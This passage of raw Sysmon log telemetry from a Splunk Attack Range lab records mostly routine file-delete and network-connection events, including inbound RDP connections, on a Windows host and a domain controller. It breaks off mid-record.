23542300x8000000000000000811131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.262{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F77AE8FF072E8344E902361FE3CE437C,SHA256=81717B6C968203E8B7B41EA726A25528C4B60DDA1AB537941D97080A5A5D2F8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811149Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:29.949{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E1CB0331A2B8D73A16537F5BDA1A4C2,SHA256=296792F0E129F52482FC3DB3D1F00E2669B34D062C379970749FC7A145B7927C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:29.067{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=059DA0C3DF420A7733038762B004F040,SHA256=CE9577B5DC089EBBDA0388004C313840EA7E9B021D2DE2CCC1705C3DDB7E05CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811148Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.285{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57517-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x8000000000000000811147Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:29.496{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A6010FD77D91BB0AE33E3E41DA977FC,SHA256=8A0AC92816CB6854E9075CC7E2790D194731A87533F09E82F054633A94AAA4B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811151Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:30.965{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4274F880DFF7CB7DC0C1B8873F996BA,SHA256=3D2740C193404077F45416A11076C2F55CCE737609EE0BCAAA5288A84016E3CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811150Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:30.246{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=9C688D75039D58AE5BB855231F407E15,SHA256=9E2FF618E77A87A5DD926582240904D3196DBD379ECB28BC96A54C1205288C75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:30.082{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A6A845B52A7D9095B97520B4182C91B,SHA256=BF5512D0C3FE3F0B6FD7F6EFF854C910642E602101D89BDEDDD8E6D8ADCDEEFD,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000811152Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:31.965{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74B52FD06C4296632843C696156CA258,SHA256=323D0497EDAAC6FF6208B8886A6027267E1889FD1397551BA6D7E22237E751C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:31.097{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F762E670B4F07E6665AD947D7A015B39,SHA256=9712274B0CC70191E630361C78B321598777EDD57B251B9730B95F835D5B7456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811153Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:32.980{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C9F6F8541E6AC9CAB890CE860052999,SHA256=4781D8F6DE88DA53E5906BD3D01ECF87E60DA5B9B8017C270960ABD241544FAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:32.099{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86FC26942CCD586D59FDFA80F887FC2B,SHA256=B67593C77A511544CAE39DA8A2DB29C3B96D5180681AFAAA639685741659885F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:33.117{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7F732F2A917C1DF27F49491825B8C41,SHA256=3DE3842B5B0D12B30627CDC861E5939A88842D4B83230A47813804649CF6796B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811155Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:33.395{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57518-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000811154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:34.058{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6DFEF8E8AA9A4BA2F8C748202419CC3,SHA256=0B6E521AA79EA225118ADC1D112F76D74B40E14BE213D96AA739DBC680C37179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:34.134{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=121BE546DDDE7CA02D3FF574EE6AF629,SHA256=D0130750021F35E3B9E0EF9F82FB129369E25E852FCA41CCF9292B03535F77FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:35.094{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFDDF146EACEC8B6C98355AC1668B284,SHA256=93E5E94980A1B90C6DD3380132EEB784EC0F806E5FF4478E052B4ABD80E562D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:35.166{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A439313CE4465A36A4AB26E0C6AB0BB,SHA256=1955C2F42A5F576ACD9BFFBD7EA81C0C573237B873F4906C62A421D6A2A4B2FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:26.736{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62023-false10.0.1.12-8000- 23542300x8000000000000000811157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:36.110{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E37AB3166BD5C0A9827C5D9A61EB32,SHA256=96B6AC0DF1924E038203EB47180B2A8D2EEC7B4102E3196D46D30FF9324799A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:36.180{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A0790396909CAFC321D447D0FC08C5F,SHA256=BCEF7831AE461312F136DB8987A8A455ACE299A1A6CC6FC0A4C1D7199AAD0D92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:37.196{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=855D299EDB810D90082B463535608F41,SHA256=832395CDF80529E91709F88B9C165C4926406E23ED7B014D9A026165B43BD10D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:37.188{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EE51E291633A770E935842AA914B24,SHA256=5661D884C3B8BB8B38DA05FA7E437999383D4DC22D53280A16344D208265FB7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:38.711{466BC892-02AF-60E8-1200-00000000CF01}400NT 
AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=888488DF46D0495A63E1BF4F7FB8F5E0,SHA256=D72F42878B2DC7B6BC6A7A352606119A10F5078D8B5BC15753A435797AD89412,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:38.216{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19BA031B37905976047DD44A71138A05,SHA256=A6B0C0904C1B8B17889DD004527C774D591818B7BE8F3ED86D08EFB3FFF215DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:38.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC7B424E1A95CE89F69C6C45A1FD7449,SHA256=A988DBEB264FDA603F3899416CB183F23324C5E26A2B74F719AE6941FC600FE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:37.998{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-14572-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000811162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:39.469{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=592BDB6504AB59F85AF43B6AEFC44669,SHA256=48DA9F4AD29256D303E18565F852A52CE03717000877DE033D751E1EADF6FC8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:39.469{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCB64855C5541B7A388AF889B5EA5B53,SHA256=22BC3FFADB4D90599B067AC95256A6CDB4D9B7B2D40DDD3E16A2B32A3C97A65D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:39.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BC9BD558B62AB112F330EBB59500B0F,SHA256=3C57CF52BA98F25CD198A8391375DFB45EBF09D1CC00CF0CA4FE9D33EDCA27FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:39.232{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12DDF3C80987CCD08DCAE96EA29A3E68,SHA256=8B34762E235FE38113B20A2B0441F10BAB91092047EAA800522C0FCD64017714,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:39.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57520-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000811165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:38.620{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57519-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000811164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:40.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE831957C9AF7A857C2A7BB6FE3D214D,SHA256=9C8C6ACEFCB792307CB1FF25005CC040FC825A1DD8F8BCEEEF5A0CDFD6C56261,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:40.478{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CF21187B9F3DB473F0253037E3A40ED,SHA256=7FD05ACDF17CB2684A0772F3898058B1E01BBC9C918F60F4F2271F9F2B020819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:40.478{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D10EC6174D8337DF09A25FDFB984CFD,SHA256=F14A8FE997296669D715FDF9A0EB912B959AB885497257BC646E97C5D89ED535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:40.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3633026FC0B234F0FBF4491CEC3759B9,SHA256=01C26673309E83FDDB22BCE3E8D7EAD399DC6439DF8749EDBD670D88811089ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:32.454{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om55728-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001055827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:31.991{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57519-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001055834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:41.262{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C9A8B0EEA7940B72C7CAE7FB6A7C89D,SHA256=1F59B7C422AC590899C021724AE7148DA94A980B4049D7CA432696D0BA95B98F,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001055833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:32.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62024-false10.0.1.12-8000- 23542300x8000000000000000811167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:41.282{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246D121D69DA1BEA9BE2B6AE8F2307A7,SHA256=89828905924C20D6EBB3C8343103F06D65EDA5729F958BB18F4344BD0EA97473,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:41.193{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000811168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:42.298{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24A0ACA182E624BC02A7B1C8392681F3,SHA256=E4B5E569E5AB06F39232DE757EB87B7410650E30D26695B4FB819AF3DAEEE91C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:42.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80388952817498CBE1578BA25796A420,SHA256=2AF2901D5E0BF215E9C419B3B746270CCEAF396234ABC7398B51AD9E9B7C7464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:43.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C9D59E8DD103098FA076D3D2DA0B2B,SHA256=C2FE3F89B1A44A741C7562B56A7E814710CAA9EC4FC9A18097529749ECE4FEAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:43.313{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8A05E23136F18513993097699B02270,SHA256=D83F3A93ED42AD51C739A72388547512D8D60F2D0B75E4C01BA714278DEC032F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:44.391{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7658852C12F29FCA47AF6E26ACD58356,SHA256=19A5B5371E133011ACABC1E466ABC63C4814DCBB196A0910A23CC60F0C85C62F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:44.328{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D98297B8113448E5AFAFAC1C197E13C,SHA256=DE9FF07D8BB24289FDD4C8B6BB10DC7AC696AD01E5BEF12F5FCCCC6EC0EEADD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:45.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC99B971CEDF3B661AEF5D06F4AF8ECE,SHA256=352232D9D014D2EBE44290B03B77933C1E35AD15264B9967200D68E33969A334,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:45.359{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CA73C9E15C83F6886CC3BADE98BDEFB,SHA256=62C6E88F94F023F5EEB96053DB67B061F8D0E0052A338065E1177905AA43560D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:46.389{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEE0BDC584EEA05DF9BC5337B1B9C3E2,SHA256=82BA8A97C380628B7D5DD73A9E88C05DEC00C15B53065E6D94DB161DB84216C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:46.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CACC5B9DB7EBC6F675892E5242EE32E,SHA256=9525640A8B77542B900FAC923AA46827062CAD1BBCF422E2618EA9BEC17C0DD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:47.457{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 